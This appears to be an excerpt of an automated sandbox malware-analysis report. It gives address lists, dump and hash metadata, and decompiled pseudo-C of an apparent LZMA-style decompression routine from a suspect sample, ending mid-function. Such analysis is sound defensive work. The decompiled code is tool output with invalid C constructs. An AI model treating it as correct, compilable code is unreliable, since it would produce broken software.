                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bd1
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00000000
                                                    0x00406ffd
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070c1
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0f
                                                    0x00406d12
                                                    0x00406d15
                                                    0x00406d17
                                                    0x00406d19
                                                    0x00406d19
                                                    0x00406d1a
                                                    0x00406d1d
                                                    0x00406d24
                                                    0x00406d27
                                                    0x00406d35
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040701a
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00000000
                                                    0x00407156
                                                    0x00407024
                                                    0x00407027
                                                    0x0040702a
                                                    0x0040702e
                                                    0x00407031
                                                    0x00407037
                                                    0x00407039
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00407160
                                                    0x00407166
                                                    0x00407168
                                                    0x0040716f
                                                    0x00407171
                                                    0x00407178
                                                    0x0040717c
                                                    0x00000000
                                                    0x0040676d
                                                    0x00407175
                                                    0x00407175
                                                    0x00000000
                                                    0x00407175
                                                    0x00406fc2
                                                    0x00407048
                                                    0x0040704e
                                                    0x00407051
                                                    0x00407054
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407088
                                                    0x0040708b
                                                    0x0040708f
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x00407073
                                                    0x00407078
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x0040709f
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x004070a1
                                                    0x0040709f
                                                    0x00000000
                                                    0x00406f14

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                    • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
                                                    • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                    • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406C26 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00406C26() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
